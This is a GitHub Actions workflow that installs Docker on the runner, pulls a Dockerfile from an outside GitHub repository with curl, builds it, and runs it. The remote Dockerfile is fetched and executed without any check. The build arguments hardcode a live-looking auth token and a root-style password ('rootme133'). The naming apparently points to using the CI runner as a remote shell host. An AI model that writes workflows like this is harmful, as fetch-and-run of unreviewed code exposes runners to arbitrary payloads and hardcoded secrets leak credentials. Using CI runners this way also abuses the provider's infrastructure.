name: Build and Run Docker

on:
  push:
    branches:
      - main  # Ganti ini jika menggunakan branch lain
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install Docker
        run: |
          sudo apt-get update
          sudo apt-get install -y \
            apt-transport-https \
            ca-certificates \
            curl \
            gnupg-agent \
            software-properties-common
          curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
          echo "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list
          sudo apt-get update
          sudo apt-get install -y docker-ce docker-ce-cli containerd.io
          sudo systemctl start docker
          sudo systemctl enable docker

      - name: Download Dockerfile
        run: |
          curl https://raw.githubusercontent.com/httpplain/1337s/main/Dockerfile -o Dockerfile 

      - name: Build Docker Image
        run: |
          docker build -t 1337l --build-arg AUTH_TOKEN=2oEloiHqig4Qq8c7SVBAokRWRf2_7RsXA5nZxdj8ezss1zqxd --build-arg PASSWORD=rootme133 .

      - name: Run Docker Container and See Logs
        run: |
          docker run 1337l
